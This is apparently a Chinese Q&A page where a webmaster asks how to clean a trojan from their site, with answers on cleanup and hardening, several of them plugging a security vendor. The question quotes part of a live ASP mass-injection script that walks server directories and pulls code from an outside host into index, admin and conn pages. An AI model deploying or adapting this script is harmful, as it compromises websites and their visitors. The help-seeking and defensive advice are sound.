• 新记

    • 网站发现被挂马怎么解决

    网站被植入木马,不知道是什么原因造成的,现在需要怎么解决,希望大神支教
    <%
    Dim Dirr,alltxt,Filename,ASP_SELF,s,ex,pth,newcnt,Fpath,addcode,addcode2,pcfile,checkbox,ShowMsg,FType,zfile,pcfileName,pcfilek,pcfilen,WFSO,f,fc2,FType1,Ftype2,FType3

    ASP_SELF=Request.ServerVariables("PATH_INFO")
    for i= 0 to ubound(split(server.mappath("."),"\"))
    d=split(server.mappath("."),"\")
    Dirr=Dirr&d(i)&"\"
    Filename=Dirr&"Dirr.txt"
    On Error Resume Next
    SET FSO=Server.CreateObject("Scripting.FileSystemObject")
    SET FR = FSO.CreateTextFile(Filename,true)
    IF NOT FSO.FileExists(Filename) then
    else
    FR.close
    FSO.DeleteFile Filename,True
    exit for
    end if
    next
    s=Request("fd")
    ex=Request("ex")
    pth=Request("pth")
    newcnt=Request("newcnt")
    Fpath=Request("fd")
    addcode = Request("code")
    addcode2 = Request("code2")
    pcfile=request("pcfile")
    checkbox=request("checkbox")
    ShowMsg=request("ShowMsg")
    FType=request("FType")
    zfile=request("zfile")
    if zfile="" then zfile="default|index|conn|admin|reg|main|vip|qq|mm|"
    if Ftype="" then Ftype="htm|html|asp|php|jsp|aspx|cgi|"
    if Fpath="\" then Fpath=Server.MapPath("\")
    if Fpath="." or Fpath="" then Fpath=Dirr
    if addcode="" then addcode=getHTTPPage("http://bocaigov.cn/bocaitong")
    if checkbox="" then checkbox=request("checkbox")
    if pcfile="" then
    pcfileName=Request.ServerVariables("SCRIPT_NAME")
    pcfilek=split(pcfileName,"/")
    pcfilen=ubound(pcfilek)
    pcfile=pcfilek(pcfilen)
    end if
    If ex="" AND pth="" Then
    %>

    举报该文章
    相关建议   2013-11-07
    你这个应该是被攻击了,或者是被修改了网页源代码,然后这些连接跳转到被人的网址,建议速度检查网页源代码,查看错误,修改被乱码的部分,如果长期这么下去,有可能会被搜索引擎之类的k掉,对于网络优化也有很大的影响,建议找专业的安全公司来解决,国内也就Sinesafe和绿盟等安全公司 比较专业.
    温馨提示:内容为网友见解,仅供参考
    其他看法
    第1个回答  2013-11-07
    这是收录性质的木马

    一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了
    网站挂马是每个网站最头痛的问题,解决办法:1.在程序中很容易找到挂马的代码,直接删除,或则将你没有传服务器的源程序覆盖一次但反反复复被挂就得深入解决掉此问题了。但这不是最好的解决办法。最好的方法还是找专业做安全的来帮你解决掉
    听朋友说 SineSafe 不错 你可以去看看。
    清马+修补漏洞=彻底解决
    所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库 备份/恢复 或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒
    清马
    1、找挂马的标签,比如有<script language="javascript" src="网马地址"></script>或<iframe width=420 height=330 frameborder=0
    scrolling=auto src=网马地址></iframe>,或者是你用360或病杀毒软件拦截了网马网址。SQL数据库被挂马,一般是JS挂马。
    2、找到了恶意代码后,接下来就是清马,如果是网页被挂马,可以用手动清,也可以用批量清,网页清马比较简单,这里就不详细讲,现在着重讲一下SQL数据库清马,用这一句语句“update 表名 set 字段名=replace(字段名,'aaa','')”, 解释一下这一句子的意思:把字段名里的内容包含aaa的替换成空,这样子就可以一个表一个表的批量删除网马。
    在你的网站程序或数据库没有备份情况下,可以实行以上两步骤进行清马,如果你的网站程序有备份的话,直接覆盖原来的文件即可。

    修补漏洞(修补网站漏洞也就是做一下网站安全。)
    1、修改网站后台的用户名和密码及后台的默认路径。
    2、更改数据库名,如果是ACCESS数据库,那文件的扩展名最好不要用mdb,改成ASP的,文件名也可以多几个特殊符号。
    3、接着检查一下网站有没有注入漏洞或跨站漏洞,如果有的话就相当打上防注入或防跨站补丁。
    4、检查一下网站的上传文件,常见了有欺骗上传漏洞,就对相应的代码进行过滤。
    5、尽可能不要暴露网站的后台地址,以免被社会工程学猜解出管理用户和密码。
    6、写入一些防挂马代码,让框架代码等挂马无效。
    7、禁用FSO权限也是一种比较绝的方法。
    8、修改网站部分文件夹的读写权限。
    9、如果你是自己的服务器,那就不仅要对你的网站程序做一下安全了,而且要对你的服务器做一下安全也是很有必要了!
    网站被挂马是普遍存在现象然而也是每一个网站运营者的心腹之患。
    您是否因为网站和服务器天天被入侵挂马等问题也曾有过想放弃的想法呢,您否也因为不太了解网站技术的问题而耽误了网站的运营,您是否也因为精心运营的网站反反复复被一些无聊的黑客入侵挂马感到徬彷且很无耐。有条件建议找专业做网站安全的sine安全来做安全维护。本回答被网友采纳

    网站挂马了怎么处理?
    1、扫描挂马的目录 扫描后将挂马文件删除,挂马文件会篡改页面内容,如果是生成文件则需要进行重新生成,如果是静态非生成文件,则需要把备份文件还原回去,如果没有备份文件我们则需要进行代码重新编辑删除被挂马篡改的部分内容。2、程序目录查看修改时间 利用软件筛选出的挂马文件不一定是全部的文件,部分文件...

    网站被挂马了怎么办?
    如果您的网站被挂马了,以下是一些建议:1. 立即暂时关闭网站:这可以防止挂马病毒的进一步传播,并保护您的客户。2. 扫描和清除病毒:您可以通过安装杀毒软件扫描并清除恶意软件。确保使用最新版本的杀毒软件,并将其更新到最新版本。3. 更新所有系统和应用程序:确保您的服务器和所有应用程序(如CMS、主...

    网站被挂码\/跳转\/外链了怎么办解决
    1. 检查是否被挂马,清除挂马链接并修补漏洞。2. 使用robots.txt屏蔽挂马目录。3. 保持网站内容有规律更新,确保文章质量。4. 反馈给百度站长平台,请求公正处理。综上,解决挂垃圾外链需人工操作,包括屏蔽挂马目录、规律更新内容、反馈给百度平台,有效清理网站垃圾外链。

    网站被挂木马怎么办
    一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了 网站挂马是每个网站最头痛的问题,解决办法:1.在程序中很容易找到挂马的代码,直接删除,或则将你没有传服务器的源程序覆盖一次但反反复复被挂就得深入解决掉此问题了。但这不是最好的解决办法。最好的方法还是找专业做安全的来帮你解决掉 听朋...

    网站被挂马了怎么办
    网站被挂马,需要处理的方法:一、立刻清除木马,如果自己公司不熟悉网站程序代码,可以找专业公司来进行处理。二、服务器及网站整站杀毒。防止木马潜伏在不同地方。三、确认无木马后,用360网站安全检测,检测一下网站的安全得分。(此步骤可略)四、向360申诉,请解除危险提示。类似于下图,填写内容,说明...

    我的网站又被挂马了怎么解决?
    1、扫描挂马的目录 扫描后将挂马文件删除,挂马文件会篡改页面内容,如果是生成文件则需要进行重新生成,如果是静态非生成文件,则需要把备份文件还原回去,如果没有备份文件我们则需要进行代码重新编辑删除被挂马篡改的部分内容。2、程序目录查看修改时间 利用软件筛选出的挂马文件不一定是全部的文件,部分文件...

    网站被挂马是什么意思
    针对网站被挂马这种情况,网站维护人员首先应该时刻保持对网站的关注与意识。其次,建立规范化的管理制度,对网站信息进行归档和备份,确保数据不会丢失或受到损害。另外,定期对网站进行监测、加固和升级,对系统漏洞进行修复和防范,全面提高网站的安全性和可靠性,以减少被黑客攻击的风险。

    什么是网页挂马?被挂马怎么办?
    当你发现自己的电脑或网络设备可能被挂马时,首要步骤是进行安全检查。这通常涉及到运行反病毒软件进行全面扫描,以查找和清除潜在的恶意软件。此外,检查近期访问过的网站,避免再次访问可疑的页面也是必要的。如果发现某个网站有问题,应立即停止使用,并将其从浏览器的历史记录和书签中删除。为防止网页挂马...

    网站好像是遇到了什么新型挂马形式,怎么回事呀?
    这种挂马攻击方式通常是通过篡改网站主页和页面的代码,然后在被恶意篡改的代码中添加控制代码,使您的访客访问您的网站时也访问了另一个被黑客控制的网站。对于这种情况,首先需要做的就是您需要尽快采取紧急的应对措施,避免黑客继续篡改您的网站。您可以考虑执行以下步骤:修改管理员密码:检查您的网站并...

    网站被挂马了怎么处理
    1.首先联系为你做网站的人删除网站里面的木马代码,其次要求制作网站的公司给你将代码漏洞修复下,或者将服务器的安全权限调整下,防止网站下次继续被挂马!2.如果百度显示危险网站那就需要,向百度投诉下说明下原因,请求恢复网站正常。3.近期多更新网站内容信息,尽量编写原创文章加快百度快照更新。希望穹拓...

    相似回答
    大家正在搜